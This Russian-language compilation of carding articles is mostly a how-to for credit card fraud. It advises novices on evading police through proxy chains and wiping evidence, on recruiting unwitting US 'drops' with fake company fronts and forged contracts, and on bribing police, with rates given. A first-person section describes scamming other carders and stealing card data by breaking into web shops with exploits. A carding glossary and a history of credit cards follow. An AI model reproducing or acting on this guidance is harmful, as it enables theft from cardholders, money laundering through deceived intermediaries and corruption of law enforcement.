Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п.
Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм.
На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде).
Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода.
И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.
Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру
. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО.
Практические советы юному кардеру
Хорошо быть богатым. Покупать крутые тачки, водить девочек в рестораны, а на выходные мотаться куда-нибудь на Кипр. В основном поэтому люди и начинают заниматься кардингом - хочется быстрых денег, хочется на Кипр.
Но случается так, что дорога приводит не под пальмы, а прямиком в тюремный барак, где небо в клеточку, а роль девочки играешь ты сам
. И виной тому не дяди в погонах, которые рано или поздно придут за тобой, а ты, так как вовремя не позаботился о своей безопасности.Прошвырнувшись по интернету и пообщавшись с толковыми людьми, я подобрал небольшую коллекцию хинтов из серии "как обезопасить себя". Возможно, некоторые из них тебе покажутся банальными, но менее важными они от этого не становятся. Прочти и запомни. И тогда, если повезет, тебе удастся избежать свиданок с ментами.
Чтоб не остаться в дураках, читай внимательно УК
Многие ньюбисы, которые втягиваются в кардинг, настолько загораются идеей сорвать халявный куш, что забывают о правовой стороне своих дел. Ведь все эти скарженные плееры и диски, ноутбуки и нал не с луны падают. Они чьи-то, и ты их не подобрал на улице, а именно украл. А воровство уголовно наказуемо, так даже в УК написано. Этим самым УК будут руководствоваться дяди в погонах, когда придут забрать тебя от мамы с папой в тюрьму. И этот самый УК ты должен выучить как свои пять пальцев, чтобы знать, на сколько времени родители могут лишиться сына, если сынуля наломает дров.
Основные статьи, на которые ты должен обратить внимание, это 159 (мошенничество), 165 (причинение имущественного ущерба путем обмана или злоупотребления доверием), 174 (отмывание денежных средств или иного имущества, приобретенных другими лицами преступным путем), 175 (приобретение или сбыт имущества, заведомо добытого преступным путем), 186 (изготовление или сбыт поддельных денег или ценных бумаг), 187 (изготовление или сбыт поддельных кредитных, либо расчетных карт и иных платежных документов), 272 (неправомерный доступ к компьютерной информации) и 273 (создание, использование и распространение вредоносных программ для ЭВМ). Скачать текст УК ты можешь по адресу http://nalog.akcentplus.ru/kodeksrf/ugol.rar. Вообще, прежде чем лезть "в бой", основательно разузнай и осознай, куда именно ты лезешь. Чтобы после счастливых улыбок от успешно скарженного добра не было слез недоумения, чего это вдруг какие-то злые дяди хотят лишить тебя свободы.
Чем меньше говорить ты будешь, тем меньше вероятность, что себя погубишь
Если, несмотря на все ужасы, описанные в УК, ты все-таки решился на ответственный шаг, запомни простое, но важное правило: "Молчание - золото". Конечно, хочется похвастаться перед кентами своей элитностью и халявным добром. Рассказать Вовану, как круто ты надул узбека из Америки. Но где гарантии, что Вова не скажет Пете, а Петя из зависти - майору милиции Козлову? Не думай, что твой напарник, с которым вы проворачиваете дела уже несколько месяцев и болтаете целыми днями по аське, не заложит тебя, если его прижучат. Во время допросов и обработки ментами он будет думать не о тебе и вашей дружбе, а о своей шкуре и свободе. И даже ближайших родственников, в которых ты полностью уверен, не стоит посвящать в тонкости своей работы. Они могут случайно сболтнуть лишнего, а отсиживать придется тебе.
После вливания в кардерский бизнес твои связи должны разделиться на личные и деловые. Те, с кем ты водишь дружбу и любовь, не должны ничего знать о делах, а те, с кем ты делаешь дела и деньги (другие кардеры), пусть остаются в неведении относительно твоей реальной жизни.
И еще. Если, помимо кардинга, ты юзаешь всякие чаты и любишь покрасоваться на форумах, не сиди везде под одним ником. "Рабочий" ник не должен больше нигде светиться. Бывает, посмотришь, вроде солидный человек, гроза кред и дропов, а введешь никнейм в ya.ru, и на первой же свалившейся паге читаешь объявку пятилетней давности: "Молодой и красивый, познакомлюсь с молодой и красивой", а внизу актуальный телефон.
Прокси - лучшая защита, юзай ее, и ты - элита
Так как большинство кардерских операций сейчас осуществляется через Сеть, то пора подумать, как бы прикрыть свою задницу, блуждая по инету. В этом деле лучшим другом для кардеров являются прокси-серверы. Далеко не каждый прокси обеспечивает полную анонимность. Некоторые из них, хоть и являются посредниками между твоим компом и атакуемой жертвой, настоящего адреса не скрывают. Другие оставляют информацию об использовании прокси. А учитывая то, что не все ресурсы позволяют зайти под проксей, и не все юзвери доверяют ныкающимся за проксями парням - это не есть гуд. Посмотреть, видит ли сервак твою проксю, можно здесь - www.all-nettools.com/pr.htm.
Поэтому наш выбор - анонимные прокси. Они не оставляют никакой лишней информации и хорошо справляются со своей основной функцией - обеспечением анонимности. Большой список анонимных проксей можно найти на kiev-security.org.ua/box/a1/2.shtml, или пошарься по netspy.ukrpack.net. На кардерпланете за 60 ВМ в месяц предлагают купить доступ к сотням быстрых анонимных проксей (или к 500K за 300 зеленых). Если есть лишние деньги, советую воспользоваться этим предложением, так как приватные серваки в любом случае лучше публичных. Проверить прокси-сервер на анонимность можно здесь - www.samair.ru/proxy/proxychecker.
Если ты серьезно задумываешься о своей безопасности, нужно, чтобы у тебя под проксей бегали не только Opera (IE), но и IRC-клиент, фтп-клиент и даже аська. Для удобства работы и настройки советую скачать занятную программу Anonimity4Proxy (http://cr0aker.tiraet.com/cgi-bin/topdl/download.pl?file=128). В ней предусмотрены настройки прокси-соединений через любые порты, возможность автозамены серваков через какое-то время, возможность отключить недоступные из браузера функции, оставляющие следы в Сети, и другие полезные фичи.
Если ты проворачиваешь простенькое дельце, к примеру, пытаешься спионерить mp3-плеер, то одного анонимного прокси будет вполне достаточно. Но если оборот твоего бизнеса составляет десятки тысяч долларов, федералы легко могут запросить информацию с прокси, под которым ты проказничал, и хозяину сервака, хочешь не хочешь, придется заглянуть в логи и отыскать твой реальный IP. Чтобы усложнить задачу людям в черном, нужно создать цепочку прокси-соединений. При этом ты сначала соединяешься с одним прокси-серваком, потом с него заходишь на второй, со второго на третий и затем, через все эти узлы, соединяешься с нужным тебе компом. Связь при этом, мягко говоря, немного ухудшается, но твоя безопасность повышается многократно. Теоретически цепочки из трех проксей достаточно, чтобы тебя не нашли, хотя гарантий никаких нет. Мало ли что ты натворишь, и насколько серьезно за тобой будут охотиться. Для удобной работы с цепочками проксей скачай программу SocksChain (www.ufasoft.com/files/sockschain_setup.exe).
И, конечно же, не забывай про фаервол, который должен быть у тебя на посту 24 часа в сутки и закрывать как можно больше портов. Подобных программ много, я могу посоветовать установить Outpost Firewall, который уже давно отлично себя зарекомендовал. Утягивай его с www.agnitum.com/products/outpost.
Коллег своих не кидай, кинуть себя не позволяй
Несмотря на то, что сам кардинг подразумевает обман других людей (практически всегда буржуев), внутри кардерского сообщества люди, кидающие "своих", вызывают только презрение. Их списки ведутся на кардерпланете на своеобразной доске позора, и называют их либо Дятлами, либо Scum of Society (отбросы общества). Тем не менее, количество их не убывает. Все время находятся особо хитрожопые индивидуумы, которые не заморачиваются принятым в среде этикетом (в сообществе кардеров есть свои правила поведения) и руководствуются только одной целью - срубить побольше бабла. Среди нескольких тысяч читателей форума www.carderplanet.net встречаются десятки подобных кидал. Всех их можно поделить на три категории: новички, любители и профи.
У первых тактика проста как две копейки - они предлагают форумянам товар или сервис, который у них якобы есть, требуют предоплату, а когда получают деньги, попросту прекращают отвечать на мыло/аську. Как правило, парни из этой категории слабо разбираются в вопросах кардинга и на форуме имеют статус ньюбиса (или вообще unregistered). В разговоре отдают предпочтение обсуждению размеров и способа перевода оплаты, а не описанию предоставляемых услуг. Внимательному человеку будет нетрудно определить такого рода кидалу, предварительно пообщавшись с ним некоторое время по аське.
Представители второй категории более подкованы в кидании коллег по ремеслу. Вначале они зарекомендовывают себя на форуме, честно предоставляя клиентам товар, завоевывая доверие остальных кардеров. Но со временем, когда заказы становятся уже более серьезными, качество услуг постепенно сходит на нет. И когда народ перестает верить отмазкам, кидала сматывает удочки и просто исчезает. Правда, только для того, чтобы вскоре снова появиться, но уже под другим ником.
Профессиональные кидалы по способам заработка схожи со своими коллегами из второй категории, но имеют намного больший опыт, а развод форумян - их постоянная и часто единственная работа. Эти парни уже долгое время тусуются в кардерской среде, знают всех инсайдеров и правила, умеют найти подход к каждому, даже самому мнительному клиенту (хотя предпочтение отдают обычно ньюбисам). Из-за хорошей осведомленности профи в кардинге, а также их осторожности, определить в них кидалу нелегко.
Лучшим советом тут будет остерегаться иметь дело с малознакомыми людьми. Форумяне обычно оставляют отзывы о качестве предоставляемых услуг, и прежде чем выходить с человеком на связь, внимательно почитай, что о нем говорят другие. Хорошую защиту от кидал дает гарант-сервис, то есть третья сторона, чей авторитет не подлежит сомнению, и через которую осуществляется сделка. Если человек согласен на такой вариант, это уже о чем-то говорит. Неплохо бы обращать также внимание на статус пользователя. Хотя членство в "verified" не дает стопроцентную гарантию, процент кидал среди них ниже, чем среди каких-нибудь "newbie".
Никогда не спеши высылать деньги. Креды, приватные прокси, полезная информация - это все, конечно, хорошо, но потрудись сначала пообщаться с их продавцом. Всегда старайся договориться об оплате после получения товара или хотя бы об авансовой оплате (вперед платится небольшая часть денег, а если все пройдет нормально, остальные деньги досылаются). Ну, а если уже кинули, сообщи об этом на форуме, чтобы кидала не разбогател на еще большую сумму.
И последнее - не советую тебе самому становиться на этот путь. Гораздо большую пользу ты принесешь себе, если заработаешь уважение среди кардеров, чем если будешь размениваться на мелочевку, кидая ньюбисов. Людей, которые кидают своих, нередко ищут и довольно жестоко наказывают. Если уж хочешь кого-то кинуть, проворачивай свои делишки с буржуями. Они и побогаче, и живут намного дальше.
Ищи только хороших дропов
Как известно, в кардинге очень важную роль играют дропы - подставные лица, через которых ты обналичиваешь украденные деньги или получаешь товар, скарженный в онлайновых магазинах. За свою помощь дроп получает денежное вознаграждение, и, так как все добро сначала приходит на его домашний адрес, именно он будет отвечать перед ментами в случае чего. Хорошего дропа найти не так уж легко. В Америке (а именно там должно проживать подставное лицо) тоже немало жадных, нечестных людей. И шанс, что дроп предпочтет оставить товар себе вместо сомнительного сотрудничества, достаточно велик. Поэтому к поиску и работе с дропами нужно подходить с умом.
В принципе, практически каждый американец с низким или средним достатком является потенциальным дропом. Хороший способ найти людей - аська со своими white pag’ами или форумы, где ищут работу (их в англонете миллион). Если у тебя туго с английским, можешь поискать среди жителей США наших эмигрантов, хотя выгоднее работать именно с коренными буржуями. Навешать лапши русскому - это не то же самое, что задурить америкоса. Чтобы дроп повелся на твое предложение, нужно создать видимость того, что ты представитель солидной развивающейся фирмы, где есть свой штат сотрудников, сайт, фирменные мыльники и подобная ерунда. Стиль писем должен быть соответствующий - официально-деловой, по которому видно, как фирма ценит каждого клиента.
Когда на твое предложение откликнется народ, расскажи заготовленную заранее легенду о том, как вы уже давно и успешно сотрудничаете с западом и перепродаете тамошнюю продукцию. Что тебе нужны люди, готовые получать и пересылать товары, зарабатывая на этом деньги. Или, если тебе нужно обналичить доллары, другую легенду (придумай уж сам). Первое время работы с дропом проверяй его. Не присылай ему дорогих товаров, не проси обналичить крупную сумму. Только когда увидишь, что человек выполняет свою работу честно и без задержек, раскручивай его дальше. Постарайся выведать об этом человеке максимум информации, а также постоянно держи его на связи. Если он будет чувствовать свою востребованность и регулярно получать обещанное вознаграждение, у него и мысли не возникнет тебя кинуть. А чтобы все было вообще замечательно, потрудись соорудить контракт, проставить "фирменные" подписи и печати и выслать факсом. Это создаст иллюзию легальности дела, а когда американская ментура постучится к посреднику в дверь (а это обязательно произойдет через несколько месяцев), у того будет какое-никакое доказательство своей непричастности к инциденту.
Несмотря на то, что работать с непосвященными дропами дешевле и удобнее, иногда имеет смысл воспользоваться услугами профессионалов. Это люди, которые знают, что товар и деньги - грязные. И сознательно берут на себя ответственность за все махинации. Естественно, за немаленький процент (обычно половину суммы). На форуме кардерпланета можно найти людей, которые всегда готовы обналичить деньги или принять товар. Можно воспользоваться также услугами зарубежных контор, которые обналичивают деньги в системе E-Gold (их список можно найти на www.golddirectory.com/e-gold.htm). В любом случае, занимаясь кардингом, всегда действуй через подставных лиц. Нигде и никогда не указывай свой настоящий адрес. Его также не должны знать сами дропы, с которыми ты работаешь, и дополнительные посредники, через которых ты, возможно, контактируешь с дропами. А если у "партнеров" появятся вопросы относительно тебя - смело ври. Причем ври так, чтобы это было невозможно проверить
.Чтоб не ругаться потом матом, сжигай любые компроматы
За время тяжкой работы по зарабатыванию чужих денег у тебя постепенно будет скапливаться полезное добро: номера кред, пароли и прочие радости, которые ты будешь называть "своим сокровищем". Для людей в серых шинелях эти же вещи проходят под названием "улики". И об этих самых уликах тебе нужно позаботиться загодя.
Во-первых, если у тебя не стоит PGP, скачай эту нужную программу с сайта www.pgp.com и закриптуй свой винт так, чтобы самому страшно от такой защиты стало.
Во-вторых, отучи себя от вредной привычки записывать деловую информацию на огрызках бумаги и бросать их где попало. Если придут менты и найдут под диваном обрывок бумажки с давно заюзанными кредами, тебе останется только кусать локти и смотреть, как эта шпаргалка гробит твою жизнь. Никакой компрометирующей информации не должно быть ни на мобиле, ни на КПК, ни на дискетах, заныканных глубоко в очке. Все на компе, все в зашифрованном виде. А если нужно срочно удалить особо компрометирующее файло, юзай программу Kremlin (www.kremlinencrypt.com), которая стирает так, что никакой uneraser не поможет.
Матерые кардеры рекомендуют также использовать виртуальный писюк. Вкратце это программа, которая создает на винте образ нового компьютера, и работать с ним можно, как если бы к тебе по сетке была подключена другая машина. Вначале "винчестер" эмулируемой тачки девственно чист, и на него можно установить любую ОС, любые программы. У VirtualPC есть одна очень полезная фича, которая вносит эту вещь в разряд "must have" для каждого уважающего себя кардера. На виртуальном компе можно запускать любые приложения, серфить по любым сетевым джунглям и вообще творить что угодно. Все это временно будет сохраняться на фейк-винте, но достаточно завершить сеанс, клацнуть "отказ от сохранения", и вся информация о твоих последних перемещениях будет удалена. Виртуальный комп примет тот вид, который имел во время включения. Скачать это чудо можно с www.microsoft.com/windowsxp/virtualpc.
Попал к ментам - не обессудь, а денежку для них добудь
Несмотря на всю немереную анонимность, которой ты себя окружил, стопроцентных гарантий, что ты не попадешь в лапы ментов, тебе не даст никто. И уж если настал роковой миг, когда в дверь тарабанят с грозным воплем: "Откройте, милиция!", не паникуй, переходи к плану Б
. На тему общения с ментами написано до фига статей, например, неплохую подборку материалов можно найти на www.prison.org. Главное, что ты должен запомнить, менты - это лживые, заискивающие и хитрые существа. И не друзья они тебе, а враги заклятые. Они будут сулить тебе свободу в обмен на чистосердечное признание, убеждать, что чем больше скажешь, тем меньше отсидишь. Но ты не ведись, на самом деле все с точностью наоборот. Ты им по фигу, им нормативы надо выполнить, посадить аккурат столько рож, за сколько премию дают. Так что держись мужественно и на все вопросы следователя отвечай: "Дяденька, вы что, да я даже терминов таких не знаю". Чем больше ты скажешь, чем больше подпишешь, тем ярче и длиннее будет твоя жизнь на зоне. Лучше промолчать и три дня отоспаться в обезьяннике, чем поговорить по душам с "добрым" опером и потом 3 года хлебать баланду.Кстати, ты в курсе, что менты, хоть все из себя и неподкупные, но кушать тоже хотят. И вряд ли откажутся, если ты сделаешь финансовый вклад в фонд развития их семей. А за это они по дружбе закроют твое дело и отпустят с миром. На лапу давать лучше всего сразу, потому что когда дело дойдет до прокуратуры, отмазаться будет намного сложнее (или дороже). Тарифы варьируются от 200 до 2 тысяч баксов, в зависимости от тяжести твоего проступка, качества компромата на тебя и жадности ментов. В среднем баксов 500, думаю, должно хватить. Если прикинешься вечноголодным студентом, можно сторговаться и подешевле. Договориться практически всегда можно. Менты в этом плане люди понимающие
.Но мой тебе совет, не доводи до этого. Разговор с операми - не самое приятное занятие. Имей голову на плечах, умей ей пользоваться и всегда будь чуточку параноиком. Где-где, а в кардинге это качество никогда не помешает.
Путь кардера
Начинающим кардерам посвящается
Для новичка в деле кардинга есть два начальных пути, которые во многом определяют его дальнейший авторитет и развитие:
1. Путь риппера – самый простой по началу - путь кидания «честных кардеров» на карты или вмз. Сразу определяет негативное отношение к самой особе кидалы.
2. Путь «честного кардера» - путь требующий достаточных знаний в области хака и социальной инженерии. Как человек прошедший оба эти пути хочу описать каждый из них
достаточно подробно, рассмотрев все их плюсы и минусы.
Путь риппера
Рипперами обычно становятся неопытные, и мало знакомые с самим кардингом, как таковым молодые люди (большинство просто дети). Малолетнего неопытного кидалу легко опознать по новозареганному 9- тизнаку, и определенно по его детской речи. Но также существуют в сети несколько экземпляров профессиональных, хорошо организованных рипперов, к примеру известный на многих кардерских порталах человек под ником BAO (этого скорее можно отнести в раздел ОЧЕНЬ хорошо организованных рипперов, нежели к професиональным). Основным инструментом кидалы является социальная инженерия – 100% проверено
что от хитрого и бывалого кидалы не спасают никакие меры, включая даже гарантов.
Первые шаги
Первое, чем я занялся когда решил попробовать себя но поприще рипперства (надо сказать к тому времени я уже был достаточно неплохим синжером) это продажа обычных карт с cvv кодом. Для этого я нашел на одном из форумов продавца карт и сделал ему «суперпредложение», сказав ему что хочу купить 7000 карт usa с cvv. Разумеется ни один
продавец не отказался бы от такого заказа (взыграла одна из главных ниточек управления синжера - жадность), и сказал что готов продать мне их. Я для порядка поломался немного, сбил немного цену и попросил у него 100 штук на проверку, убедив его что я буду постоянным и выгодным покупателем. Получив свои 100 халявных карт ушел в оффлайн и сменил аську (на asechka.ru продаются обычные 6-тизнаки по 1 вмз за штуку).
Легкие деньги
Вторым серьезным желанием стало желание обогатиться =). Т.к. честно стыренных карт было уже достаточно много (~600 шт.), я решил разводить людей уже на деньги. Это оказалось несложно, я предлагал людям купить огромные базы за смешные деньги (первая сделка была - 3000 карт за 180 вмз, при минимальной «рыночной» цене – 1.5 вмз за штуку) и предлагал на проверку те карты, добытые на халяву. Таким образом я срубил около 600$ за 2 месяца.
Эволюция
Потом простые карты с cvv кодом уже перестали меня интересовать, т.к. были дешевы и не приносили особой прибыли. Следующей ступенью была продаж карт с full info и enroll. Тут я заработал еще около 200$, но дело как-то не шло, и я решил заняться чем-нибудь другим – более прибыльным. Я решил «продавать» карженую технику. Знаете сайт carderproduct.org? Вот это и есть самые настоящие кидалы. Я работал более скромно но все же неплохо рубил бабла на этом. Особенно хорошо расходились телефоны nokia 6600 и нубуки =). Тут существует много способов развести человека, но для всех них нужно иметь неплохой опыт в синженерии. Важно представить себя как серьезного продавца и показать что ты не собираешься идти на уступки и доказать покупателю что это в его интересах чтобы ты с ним работал. Можно наоборот показаться глупым ламером и делать очень много уступок, а потом когда человек расслабиться незаметно предложить ему свою незначительную с виду идею, которая тем не менее позволит провернуть твой грязный замысел =).
Заключение.
Малолетние рипперы – жалкие, презренные люди, достойные только сожаления, готовые за 5 баксов из тебя душу вытрясти своими неумелыми попытками тебя кинуть. Рипперы профессиональные лично мне внушают только уважение, как отличные синжеры (хотя надо сказать этому таланту можно было бы найти и лучшее применение).
Плюсы:
- ненужно много ума
- достаточно безопасно
- можно заработать неплохие деньги (200 – 300$ в месяц)
Минусы:
- отрицательное отношение со стороны нормальных кардеров
Пост скриптум
В период работы с енроллом я понял что на нем можно неплохо заработать никого не кидая и, найдя дропа, начал его налить.
Путь кардера.
Про это написано уже много статей, так что я не буду повторять их а просто напишу кое-что упущенное в них, либо исправлю морально устаревшие ошибки этих статей. Для человека решившего стать нормальным кардером необходимо иметь неплохую базу в плане хакинга. Во многих старых статьях «для начинающих кардеров» писали о взломе инет-шопов через Гугл, юзая примитивные багги php/perl inlude. Сейчас такое уже не проходит, или проходит тока с самыми захиревшими шопами в которых вряд ли есть что нибудь полезное. Можно для начала посоветовать где-нибудь достать (купить) базу хостера – там наверняка есть парочка шопов. В конце концов можно просто просканить сервак шопа на предмет уязвимых сервисов и ломануть его каким-нибудь публичным или приватным эксплойтом. Так можно достать карты. Далее их можно продавать, что дает небольшой но стабильный доход, а главное – это достаточно безопасно. Далее можно использовать карты для закупки в инет шопах
(разумеется заказывать не на себя – для этого есть дропы). Если у тебя появиться карты с full info, то их можно использовать для онлайн доступа (заенроллить) и управлять счетом кардхолдера через инет; возможно осуществлять операции перевода на другие счета и т.п., но это чревато прозвоном из банка, который требует во-первых неплохого знания английского, а во-вторых опять навыка синженерии. Можно заказать себе так называемый «белый пластик» и пойти шопиться в реальных магазах.
Плюсы:
- можно заработать очень много денег
- можно продуктивно сотрудничать с другими кардерами
Минусы:
- достаточно небезопасно
- новичку изначально нужны неплохие знания в области хакинга
Заключение
Я не призываю народ заниматься кардингом. Эта статья написано исключительно для ознакомления и обезопасивания себя, а также просто как публицистический рассказ =).
Краткий кардерско-русский словарь
CC, картон, карты – кредитные карты или информация о них.
Фрауд (fraud) – незаконная операция. Со всеми вытекающими отсюда последствиями.
Кардхолдер (cardholder) – владелец карты
CVV/CVV2/CVN код – три-четыре цифры, улучшающие защиту карт при оплате через интернет. Теперь карты без этого кода практически нигде не принимаются.
Чекать карты (проверять на валидность) – проверка кредитных карт на работоспособность. Кредой могли воспользоваться до тебя, из-за чего кардхолдер мог ее заблокировать и, следовательно, сделать по ней уже ничего нельзя. Поэтому креды стоит брать у проверенных продавцов или где-то проверять. Проверка обычно заключается в съеме с карты минимально возможной суммы (около 10 центов). Если снять удалось, значит, креда рабочая, и ее надо срочно куда-нибудь вбивать. Проверять лучше через спецпрограммы или в специальных местах. На порносайтах чекать не советую, так как именно там они и убиваются.
Вбивальщик – человек, который знает, как правильно купить товар в е-магазине или аккаунт на порносайте, так чтобы при этом не появилось сообщение transaction declined.
Вещевой кардинг – одна из разновидностей кардинга, заключается в покупке реальных вещей по украденной креде. Обычно это бытовая техника, так как потом ее можно продать. А продавать надо, потому что, во-первых, ее очень сложно ввезти в Россию, а во-вторых – никому не нужны дома вещественные доказательства. Продажей может заниматься,
например, иностранный дроп.
Дроп (от англ. drop – бросать) – человек, на которого «скидываются» наличные, чеки или товары, заказанные в магазине, которые он потом передает своему нанимателю. Дроп может и не знать, что приобретено все не совсем честным способом. Или наоборот, заниматься этим
профессионально.
Вайер (wire transfer) – банковский перевод. Идет долго, но надежно. Весьма вероятен и чарджбэк, если деньги краденые. Чарджбэк (money back) – отзыв денег. Делают интернет-магазины, банки, электронные системы платежей. Производится, когда жертва кардинга
заявляет, что ее обокрали. Поэтому в кардинге большое значение придается отмыву и обналичке денег.
Money orders или Cashier Checks – чеки, которые заранее оплачены. Из всех видов чеков эти - самые удобные для кардеров. С остальными приходится долго возиться: посылать их на проверку в другой банк и заполнять кучу бумаг. А эти чеки не требуют такого напряжения, правда и комиссионный процент у них очень неслабый.
Транзакция – операция по карте, начинающаяся с идентификации кардхолдера и до момента выдачи денег.
Палка – PayPal, система электронных платежей (типа наших WebMoney). Существенное отличие в том, что туда можно переводить деньги с креды. Правда, делать это становится все труднее и труднее - организуются лимиты ввода, лимиты вывода и еще много разных ограничений.
Нальщик – человек, который помогает перевести деньги в наличность. Допустим, к тебе пришел чек. Отдаешь его нальщику – получаешь наличность. Нальщики не налят креды! В основном они работают с чеками, банковскими вайерами, денежными переводами.
Эскроу-сервисы (escrow services) – конторы, которые играют роль гарантов при работе с аукционами. Ты им отсылаешь деньги, ЭС сообщает продавцу, что деньги есть, и он (продавец) отсылает товар. Получив его, ты сообщаешь об этом, и деньги уходят продавцу.
Белый пластик – это не пластик от элитных производителей, как мне однажды заявил «гуру» кардинга, а просто белый кусок пластика (обычно марки CR-80) с пустой магнитной полосой. Похож на CD-болванку, и на него тоже можно записать много интересного wink.gif.
Дамп – информация, записанная на магнитной полосе кредитной карты. Обычно состоит из 2 или 3 треков.
Трек (дорожка) – кусок информации, записанный на карте. Всего на карте их 3. Первый – инфа о владельце, второй – инфа о владельце, о банке и др., третий – запасной или для дополнительной информации. Самый важный - это второй трек. Третий нам не интересен, так как ничего ценного собой не представляет.
Эмитент пластиковой карты (card issuer) – контора, которая выдала карту. Это может быть банк, магазин (дисконтная карта) и др. Мы будем говорить о банковских кредитных картах, поэтому в качестве эмитентов будем рассматривать банки.
BIN (Bank Identification Number) – первые несколько цифр номера карты, которые указывают на банк-эмитент. Обычно это первые шесть цифр. Если банк очень крупный, достаточно и первых трех цифр. Банк-эквайер (acquirer) – банк, отвечающий за первичную обработку
тразакций. То есть, сначала он работает с твоей кредиткой, магазинами, в которых ты отовариваешься, банкоматами, в которых ты получаешь деньги. Именно он распространяет стоп-листы.
Авторизация – процесс проверки наличия средств на счете у клиента.
Мерчант аккаунт (merchant account) – специальный счет в банке, который открывается продавцом, чтобы снимать деньги с карт-счетов. Например, решил ты принимать оплату кредитными картами. В банке открываешь такой счет, и на него поступают деньги от покупателей. Чтобы тебе не ждать, пока перейдут деньги с карт-счета, банк платит тебе
из своего кармана, а сам ждет тех денег. Поэтому, чтобы открыть такой счет, нужно просто излучать уверенность, что твой ларек завтра не обанкротится.
Эмбоссер – аппарат, который выдавливает инфу на картах. Обращал внимание, что на кредитках буквы не нарисованы, а как бы выдавлены? Этим и занимается эмбоссер.
Энкодер (ридер) – девайс для чтения и записи инфы с магнитной полосы кредитки.
ATM (Automatic Teller Machine) – банкомат.
Импринтер – устройство, которое печатает на слипе данные, эмбоссированные на карте, и данные о точке, на которой расположен импринтер.
ПОС-терминал (point-of-sale terminal) – устройство, установленное в магазинах. Считывает инфу, записанную на магнитной полосе, и связывается с банком для проведения транзакции. В отличие от банкомата, ПОС-терминал управляется кассиром. В большинстве случаев
идентификация покупателя является визуальной, то есть кассир не спрашивает пин-код или удостоверение личности. Это не касается нескольких видов карт, требующих полной авторизации и идентификации при использовании.
Рассматриваем креду со всех сторон
Кредитки уже давно вошли в нашу повседневную жизнь окончательно и бесповоротно. Многие с их появлением почти забыли про наличные. Конечно, на это повлияло множество сопутствующих факторов: практичность, удобство, распространенность и относительная безопасность.
Но сегодня мы рассмотрим креды не с привычной – электронной - стороны, а с несколько другой – что это за кусок пластика и каким образом он работает.
История
Самые первые кредитки появились около ста лет назад (в США – где же еще), тогда они использовались исключительно в магазинах, ресторанах и отелях для обслуживания респектабельных постоянных клиентов, и ни о каком серийном производстве не было и речи. Карточки, по сути, пришли на смену оплаты в рассрочку. В те далекие времена креды были сделаны из толстого картона, затем появились металлические карточки (уже эмбоссированные), и только потом, после длительных экспериментов с различными пластмассами, появились пластиковые карты.
Первой фирмой, занимающейся серийным выпуском кредиток (для ресторанного бизнеса) стала Dinners Club (с 1949 года). Тогда впервые фирма-производитель кред работала посредником между покупателем и продавцом. Также Dinners Club попыталась создать универсальную карту (между прочим - фирма жива до сих пор). Затем производством кред занялась American Express (крупнейший производитель дорожных чеков), Bank of America и Chase Manhattan Bank (два крупнейших банка страны). В 1966 году Bank Of America совершил серьезный прорыв, позволив другим банкам проводить операции с их фирменными кредитками BankAmericard. За короткий срок эта платежная система получила национальный масштаб, затем в стране организовалась вторая подобная система - Interbank Cards Association.
В скором времени пластиковые карты стали международным стандартом, количество пользователей измерялось десятками миллионов. В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции. Кстати, эти две системы долгое время противостояли друг другу, запрещали банкам одновременно выдавать обе карты, но это было раньше. Совершенствование кред продолжается до сих пор, следующим этапом эволюции планируется практически полный переход на смарт-карты, что добавит множество плюсов (в первую очередь – серьезную защиту, построенную на криптографических алгоритмах), но об этом я расскажу ниже.
Стандарт
Введение мирового стандарта послужило решающим фактором для всеобщего признания. На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию. Естественно, по этому мировому стандарту и производится абсолютно все обслуживающее оборудование (импринтеры, электронные терминалы, банкоматы). Производителям пластиковых карточек позволено только экспериментировать с дизайном карточек, да и то в очень строгих рамках.
Все кредитки можно разделить на несколько классов:
Чиповые карты (смарт-карты) – кредитки со встроенной микросхемой или памятью (чипом).
Эмбоссированные карты – кредитки, часть текста на которых печатается методом тиснения или термопечати. Эмбоссированный текст необходим для печати оттисков на чеках, но такое используется в основном в США и для визуального распознавания текста.
Магнитные карты – креды с магнитной полосой.
Такое разделение крайне условно, так как в большинстве кред эти характеристики сочетаются (иногда одновременно все три).
Кредитка состоит из нескольких отдельных функциональных элементов, о которых я ниже расскажу подробнее: кусок пластика (с эмбоссированным текстом), магнитная полоса, микросхема или память (чип) и некоторые другие менее значимые элементы.
Основа
Сама карточка сделана из куска особого пластика размером 85,6х53,98х0,76 мм. Пластик производится по сложной технологии, окрашивается, на заготовку наносятся обязательные общие данные про эмитент и платежную ассоциацию, а также - памятка владельцу, контактная инфа производителя и фотография владельца. После этого креда ламинируется, затем (по необходимости) на ней эмбоссируются или выжигаются лазером необходимые идентификационные данные (номер карты, имя владельца, срок действия), встраивается чип или магнитная полоса. При производстве особое внимание уделяется безопасности во время персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)). Также все этапы производства креды находятся под пристальным контролем качества - брак должен моментально отсеиваться, а карта должна удовлетворять множеству международных требований, в том числе - выдерживать нагрев до определенных температур, сопротивляться определенным механическим воздействиям и многое другое (все по тому же стандарту).
Магнитная полоса
